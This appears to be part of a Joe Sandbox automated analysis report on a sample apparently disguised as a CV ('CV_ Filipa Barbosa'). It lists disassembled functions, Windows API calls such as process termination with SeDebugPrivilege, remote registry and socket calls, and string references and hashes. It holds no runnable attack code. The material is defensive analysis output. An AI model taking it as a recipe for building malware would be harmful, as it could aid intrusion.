Part of subcall function 00336EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00335FA6,?), ref: 00336ED8

Part of subcall function 00336EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00335FA6,?), ref: 00336EF1

Part of subcall function 003372CB: GetFileAttributesW.KERNEL32(?,00336019), ref: 003372CC

lstrcmpiW.KERNEL32(?,?), ref: 003375CA
_wcscmp.LIBCMT ref: 003375E2
MoveFileW.KERNEL32(?,?), ref: 003375FB

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 571062bf585ab5a927b4b3ecc3e368afca0c38788e11c8c3102fac580f77c062
Instruction ID: 2c370bdcde4c70e0a6477c5a230069b541a206151a81264fc6a56f7f2358f53b
Opcode Fuzzy Hash: 571062bf585ab5a927b4b3ecc3e368afca0c38788e11c8c3102fac580f77c062
Instruction Fuzzy Hash: 305132F29092195ADF66EB94D8819DE73BC9F0C310F00449AF605E7541EA7496C5CF64

Function 0030EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0036DAD1,00000004,00000000,00000000), ref: 0030EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0036DAD1,00000004,00000000,00000000), ref: 0030EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0036DAD1,00000004,00000000,00000000), ref: 0036DC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0036DAD1,00000004,00000000,00000000), ref: 0036DCF2

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 6021a9f55b0a2ace840fc94494df7733eb69fc7c3ca6ea42a9d02590bb303488
Instruction ID: 204d43d59c4223537a49393e44b858600ee5e084c8cafec29df319b1b04f7a53
Opcode Fuzzy Hash: 6021a9f55b0a2ace840fc94494df7733eb69fc7c3ca6ea42a9d02590bb303488
Instruction Fuzzy Hash: 6941F67170F6849AD73B4B288DADB3A7AAEAF45305F5A4C0DF14B86DE1C670B880C711

Function 0032B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0032AEF1,00000B00,?,?), ref: 0032B26C
HeapAlloc.KERNEL32(00000000,?,0032AEF1,00000B00,?,?), ref: 0032B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0032AEF1,00000B00,?,?), ref: 0032B288
GetCurrentProcess.KERNEL32(?,00000000,?,0032AEF1,00000B00,?,?), ref: 0032B290
DuplicateHandle.KERNEL32(00000000,?,0032AEF1,00000B00,?,?), ref: 0032B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0032AEF1,00000B00,?,?), ref: 0032B2A3
GetCurrentProcess.KERNEL32(0032AEF1,00000000,?,0032AEF1,00000B00,?,?), ref: 0032B2AB
DuplicateHandle.KERNEL32(00000000,?,0032AEF1,00000B00,?,?), ref: 0032B2AE
CreateThread.KERNEL32(00000000,00000000,0032B2D4,00000000,00000000,00000000), ref: 0032B2C8

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 5a2ea1b6654d63b9f8ea63f9847ebfc0e5f828a371b28efe48037b8d963cfc9b
Instruction ID: dd98d691a6207b4f82b4f8536345542e26056a518ef9b18ae7900b5ab4d7d0cd
Opcode Fuzzy Hash: 5a2ea1b6654d63b9f8ea63f9847ebfc0e5f828a371b28efe48037b8d963cfc9b
Instruction Fuzzy Hash: 0F01B6B5240308BFE721ABA5DC49F6B7BACEF88711F458411FA09DB1A1CA749840CB61

Function 0034C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0034C876, 0034C887
Not an Object type, xrefs: 0034C49E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 9493912e386403b4facb3eec1666d72bbdeaf60159afd5124aec285cd2b2d9fe
Instruction ID: ed87b5163ac4b4f518c715fea0e42efa547558cc89d54fd17548edf335d1296b
Opcode Fuzzy Hash: 9493912e386403b4facb3eec1666d72bbdeaf60159afd5124aec285cd2b2d9fe
Instruction Fuzzy Hash: 40E1D071A11219AFCF52DFA8C881AEEB7F9EF48314F159069F905AF281D770AD41CB90

Function 003416DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 002F936C: __swprintf.LIBCMT ref: 002F93AB
Part of subcall function 002F936C: __itow.LIBCMT ref: 002F93DF

Part of subcall function 0030C6F4: _wcscpy.LIBCMT ref: 0030C717

_wcstok.LIBCMT ref: 0034184E
_wcscpy.LIBCMT ref: 003418DD
_memset.LIBCMT ref: 00341910

Strings

X, xrefs: 00341948
p2:l2:, xrefs: 00341920

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$p2:l2:
API String ID: 774024439-4260850672
Opcode ID: 6e73dcb2720906bded907713fe175fb0ec6fd566d87e66c40da86d4c9429979d
Instruction ID: 2a112df7129bd2e57c784c5a742d387dea104eeb5480bd34390b9b2e05b46474
Opcode Fuzzy Hash: 6e73dcb2720906bded907713fe175fb0ec6fd566d87e66c40da86d4c9429979d
Instruction Fuzzy Hash: 4AC16A355147449FC725EF24C981AAAF7E4BF85394F00492DF9899B2A2DB30E854CF82

Function 00359A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00359B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 00359B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00359B47
_wcscat.LIBCMT ref: 00359BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00359BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00359BE7

Strings

SysListView32, xrefs: 00359AEB

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 25753b53a00b3faffadfb360609c17e4bc40b43cadb37a6ed2943d54f9ec26b1
Instruction ID: 4388b2927838316f8ea5853edf5bf64f90a26bf6b8893dadac38ffcf798e1f70
Opcode Fuzzy Hash: 25753b53a00b3faffadfb360609c17e4bc40b43cadb37a6ed2943d54f9ec26b1
Instruction Fuzzy Hash: BE41A170900308EBEB229F64DC85FEE77B8EF08351F11042AF949A72A1D6719D88CB60

Function 0035172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00336532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00336554
Part of subcall function 00336532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00336564
Part of subcall function 00336532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003365F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0035179A
GetLastError.KERNEL32 ref: 003517AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 003517D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00351855
GetLastError.KERNEL32(00000000), ref: 00351860
CloseHandle.KERNEL32(00000000), ref: 00351895

Strings

SeDebugPrivilege, xrefs: 003517B8

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: d48df14c4ef67bbe9c8ffbb277f8922b146e1774c09ead957073abdbee1064bc
Instruction ID: 3e67a2288c1386841467363d9fee1a53c80c27d2d93c14a32f5e6f7455a82eac
Opcode Fuzzy Hash: d48df14c4ef67bbe9c8ffbb277f8922b146e1774c09ead957073abdbee1064bc
Instruction Fuzzy Hash: 81419F71600200AFDB16EF54C8E5FAEB7B5AF54311F058058F9069F2E2DBB5A948CF91

Function 00335819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 003358B8

Strings

question, xrefs: 00335871
info, xrefs: 00335859
stop, xrefs: 00335889
warning, xrefs: 003358A1
blank, xrefs: 0033583A

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 179f25bff854cffc09ddb32c24bf24c20862b7d70250990a7d6a32a83e27cdb8
Instruction ID: 15d7be1ce89f777352db240b98990ab236b4112e37c2f22257207e4b9589fa6b
Opcode Fuzzy Hash: 179f25bff854cffc09ddb32c24bf24c20862b7d70250990a7d6a32a83e27cdb8
Instruction Fuzzy Hash: 5911EB32709742FAE71B5B549CC3DEA73DCEF15714F20003AF511BD281E7A0AA814264

Function 0033A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0033A806

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 433ccdf1e4695f43c7114a211aa9e969cd6c2d45e27cf937ea12ebb5ea0afb17
Instruction ID: 9cf6bb240001834f9a93304c7f1d9297c268a6928cf5570ecbf49ed7021d1bf0
Opcode Fuzzy Hash: 433ccdf1e4695f43c7114a211aa9e969cd6c2d45e27cf937ea12ebb5ea0afb17
Instruction Fuzzy Hash: 70C1AD71A0460ADFDB12CF98C4C1BAEB7F4FF08315F20406AE685EB281D735A981CB91

Function 00336B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00336B63
LoadStringW.USER32(00000000), ref: 00336B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00336B80
LoadStringW.USER32(00000000), ref: 00336B87
_wprintf.LIBCMT ref: 00336BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00336BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00336BA8

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 5344b3f823a7fb72bcda2be34b9fb582b04da9cbd8b9b124afd33f5f9216b58f
Instruction ID: adedcc6c0821e4d90f8b1ca2ce04a8344c0694c9fda37840c4c82c62ccf0d090
Opcode Fuzzy Hash: 5344b3f823a7fb72bcda2be34b9fb582b04da9cbd8b9b124afd33f5f9216b58f
Instruction Fuzzy Hash: A40112F65002087FEB52AB949D89EF6777CDB08304F404495B749E6041EA749EC48F75

Function 00352B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00353C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00352BB5,?,?), ref: 00353C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00352BF6

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 6b354c1d1256e96ccca36b7b1cbd5e799389c3395cabd0cbec2e8c30df7e0a1c
Instruction ID: 2f0e04fb3c24d44adefb04b9c44db9fa7564af5398555c91849b18ed6fdc52ae
Opcode Fuzzy Hash: 6b354c1d1256e96ccca36b7b1cbd5e799389c3395cabd0cbec2e8c30df7e0a1c
Instruction Fuzzy Hash: C29166312042059FCB12EF14C895E6EB7F5BF89310F04885DF9969B2A2DB34E949CF42

Function 0034961C Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 00349691
WSAGetLastError.WSOCK32(00000000), ref: 0034969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 003496C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003496E9
WSAGetLastError.WSOCK32(00000000), ref: 003496F8
inet_ntoa.WSOCK32(?), ref: 00349765
htons.WSOCK32(?,?,?,00000000,?), ref: 003497AA

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ErrorLast$htonsinet_ntoaselect
String ID:
API String ID: 500251541-0
Opcode ID: 0a372b84f0a2245d93cf08ba6a7c75ea26024101974531854583b0f66869ff1b
Instruction ID: fe3adebe73badbef0fbf461c31026f9f10037d3dffef8cfa3155979bf55b5ad8
Opcode Fuzzy Hash: 0a372b84f0a2245d93cf08ba6a7c75ea26024101974531854583b0f66869ff1b
Instruction Fuzzy Hash: 9D71CD31504244AFC726EF64CC85F6BB7E9EF84714F104A2EF5559B2A1EB30E904CB92

Function 0031A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 0031A991

Part of subcall function 00317D7C: __FF_MSGBANNER.LIBCMT ref: 00317D91
Part of subcall function 00317D7C: __NMSG_WRITE.LIBCMT ref: 00317D98
Part of subcall function 00317D7C: __malloc_crt.LIBCMT ref: 00317DB8

__lock.LIBCMT ref: 0031A9A4
__lock.LIBCMT ref: 0031A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,003A6DE0,00000018,00325E7B,?,00000000,00000109), ref: 0031AA0C
EnterCriticalSection.KERNEL32(8000000C,003A6DE0,00000018,00325E7B,?,00000000,00000109), ref: 0031AA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 0031AA39

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 81385aecad8952151989c3356520eb39e7175a49d048e671a3234ad7d09f1f3a
Instruction ID: 08b80f71e5535bfc38d5b56b8f958a00f2f36b457c77fa553f2f155b57acc856
Opcode Fuzzy Hash: 81385aecad8952151989c3356520eb39e7175a49d048e671a3234ad7d09f1f3a
Instruction Fuzzy Hash: CA416D71902A059BEB2E8F68D9417DDB7B4AF09336F158318E525AF2D1D774D8C0CB81

Function 00358ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00358EE4
GetDC.USER32(00000000), ref: 00358EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00358EF7
ReleaseDC.USER32(00000000,00000000), ref: 00358F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00358F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00358F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0035BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00358F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00358FAA

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: c654c737e1b750b18cb032bad91182de43ebc68483611424d568d0824fc0b5f4
Instruction ID: 5598063093bb7cdd9982362892d19ab80bf52217e4ed0e83d35f9ae9de7c8cce
Opcode Fuzzy Hash: c654c737e1b750b18cb032bad91182de43ebc68483611424d568d0824fc0b5f4
Instruction Fuzzy Hash: 7B317F72200214BFEB228F54DC4AFEA3BADEF49716F054065FE08AA191C6759841CB70

Function 00360133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0030B34E: GetWindowLongW.USER32(?,000000EB), ref: 0030B35F

GetSystemMetrics.USER32(0000000F), ref: 0036016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0036038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003603AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 003603D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003603FF
ShowWindow.USER32(00000003,00000000), ref: 00360421
DefDlgProcW.USER32(?,00000005,?,?), ref: 00360440

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: c228552a28c87abbd6e7f2f39ec7080a55831d90b1afdae98a29c45906b5094d
Instruction ID: 6874349633df4f371ac8a3f42dbd0ee7803b3b0534eeadac97fcb1b54df3c730
Opcode Fuzzy Hash: c228552a28c87abbd6e7f2f39ec7080a55831d90b1afdae98a29c45906b5094d
Instruction Fuzzy Hash: 4BA1CD34600616EBDB1ACF68C99A7BEBBB5FF08701F15C115EC58AB298D734AD50CB90

Function 0030AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8662c06c0ed37eaf8d0541690a6db4a652b32a94fe7d461ee9c04db4cfb88663
Instruction ID: 202d68abf62d51ab3220ba94f7f5cf8be0928302668807884ff078f57e0d848f
Opcode Fuzzy Hash: 8662c06c0ed37eaf8d0541690a6db4a652b32a94fe7d461ee9c04db4cfb88663
Instruction Fuzzy Hash: C3718F7190160AEFCB16CF98CC58EAEBB79FF85310F248149F915AB290C730AA51CF61

Function 00352230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0035225A
_memset.LIBCMT ref: 00352323
ShellExecuteExW.SHELL32(?), ref: 00352368

Part of subcall function 002F936C: __swprintf.LIBCMT ref: 002F93AB
Part of subcall function 002F936C: __itow.LIBCMT ref: 002F93DF

Part of subcall function 0030C6F4: _wcscpy.LIBCMT ref: 0030C717

CloseHandle.KERNEL32(00000000), ref: 0035242F
